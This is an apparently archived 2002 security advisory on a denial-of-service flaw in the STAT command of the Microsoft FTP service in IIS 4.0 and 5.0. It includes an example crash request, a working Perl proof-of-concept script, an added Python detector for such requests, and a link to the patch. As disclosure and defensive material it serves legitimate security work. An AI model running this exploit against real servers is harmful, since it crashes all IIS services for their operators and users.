
Microsoft FTP Service DoS using STAT Globbing
17th Apr 2002 [SBWID-5266]
COMMAND

	Microsoft FTP Service DoS using STAT Globbing

SYSTEMS AFFECTED

	 IIS 5.0

	 IIS 4.0

PROBLEM

	H D Moore [http://www.digitaloffense.net/] found the following:
	

	The Microsoft FTP service is vulnerable to a Denial of Service attack
	in the STAT command. This DoS can be triggered by a remote attacker
	using either a valid user account or the anonymous account, which is
	enabled by default. Once exploited, all services running under the
	inetinfo.exe process will terminate. On IIS 5.0 and above, these
	services are supposed to restart; on IIS 4.0 the services must be
	restarted manually. This vulnerability appears to be impossible to
	exploit to gain a remote command shell. Versions other than 4.0 and 5.0
	were not tested.
	

	 Details

	 =======

	

	This vulnerability was discovered in November 2001 by a "fuzzer"
	script I wrote to audit FTP daemons for problems in the globbing
	functionality. This script created and sent random arguments to the
	"STAT" command consisting of various combinations of globbing
	characters. The original fuzzer had to be modified to use the Windows
	glob characters instead of the normal Unix set. Within 20 seconds the
	script had caused an access violation on a fully patched IIS server.
	

	An example request which can cause the crash:
	

	

	        STAT ?*<240 x X>

	

	

	The crash occurs when a memchr call is passed a pointer which
	dereferences to a NULL. It may be possible to overwrite this memory
	with an arbitrary path and use this exploit to obtain a directory
	listing, but all attempts so far have failed and constantly restarting
	IIS and retrying was getting old.
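
	A defender-side check for the request shape shown above, as an added
	example (not part of the original advisory or of H D Moore's script):
	it classifies FTP control-channel command lines and flags STAT
	arguments that combine wildcard characters with an overlong argument.
	The function names, the `*`/`?` wildcard set and the 128-byte
	threshold are assumptions of this sketch.

```python
import re

# Assumptions of this sketch, not values from the advisory: the wildcard set
# is '*' and '?', and 128 bytes is an arbitrary cutoff for an overlong argument.
GLOB_CHARS = b"*?"
MAX_ARG_LEN = 128
CMD_RE = re.compile(rb"^\s*([A-Za-z]{3,4})(?:[ \t]+(.*?))?\s*$")

def parse_command(line: bytes):
    """Split one FTP control-channel line into (VERB, argument bytes)."""
    m = CMD_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return None, b""
    return m.group(1).upper().decode("ascii"), m.group(2) or b""

def classify(line: bytes) -> str:
    """Return 'alert', 'review' or 'ok' for a single client command."""
    verb, arg = parse_command(line)
    if verb != "STAT":
        return "ok"
    has_glob = any(b in GLOB_CHARS for b in arg)
    overlong = len(arg) > MAX_ARG_LEN
    if has_glob and overlong:
        return "alert"   # wildcards plus long filler, the shape in the advisory
    if has_glob or overlong:
        return "review"  # unusual on its own for STAT; worth a look
    return "ok"

def scan(lines):
    """Yield (line_number, verdict, summary) for every non-ok command."""
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict != "ok":
            verb, arg = parse_command(line)
            yield n, verdict, f"{verb} arg_len={len(arg)}"

# Constructed sample of client commands (not captured traffic).
SAMPLE = [
    b"USER anonymous\r\n",
    b"STAT\r\n",
    b"STAT /pub/readme.txt\r\n",
    b"stat *.txt\r\n",
    b"STAT ?*" + b"X" * 240 + b"\r\n",
    b"LIST *\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```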
	

	

	 Scripts

	 =======

	

	DoS Proof of Concept
	

	

	#!/usr/bin/perl -w
	##################
	##################
	#
	#
	#   URL: http://www.digitaloffense.net/
	# EMAIL: hdm@digitaloffense.net
	# USAGE: ./msftp_dos.pl <target ip>
	#
	# Summary:
	#
	#        The Microsoft FTP service contains a vulnerability in the STAT
	#        command with the pattern-matching (glob) code. This vulnerability
	#        could be exploited to execute a Denial of Service attack. This
	#        affects IIS 4.0 and 5.0 and requires the attacker to be able to
	#        access the service either through a valid user account or via the
	#        anonymous login which is enabled by default. The DoS attack will
	#        bring down all services running under IIS (the inetinfo.exe process).
	#
	#        IIS 4.0 must be manually restarted to restore normal operation. IIS 5.0
	#        will automatically restart the crashed services, but any users connected
	#        to the service at the time of exploitation must reconnect.
	#
	#        At this time, there seems to be a slim-to-none chance of being able to
	#        execute arbitrary code through this vulnerability.
	#
	# Solution:
	#
	#	http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
	#

	use Net::FTP;

	$target = shift() || die "usage: $0 <target ip>";
	my $user = "anonymous";
	my $pass = "crash\@burn.com";
	my $exp = ("A" x 240);

	print ":: Trying to connect to target system at: $target...\n";
	$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
	$ftp->login($user, $pass) || die "could not login: $!";
	$ftp->cwd("/");

	print ":: Trying to crash the FTP service...\n";
	$ftp->quot("STAT *?" . $exp);
	$ftp->quit;

	

	

	

	

	

SOLUTION

	Patch available at
	

	http://www.microsoft.com/technet/security/bulletin/MS02-018.asp

	

	

	

	 Credits

	 =======

	

	The following people helped in one form or another:
	 * bind

	 * rkl

	 * halvar

	 * tsnoop

	 * ah / da (vulnhelp)

	
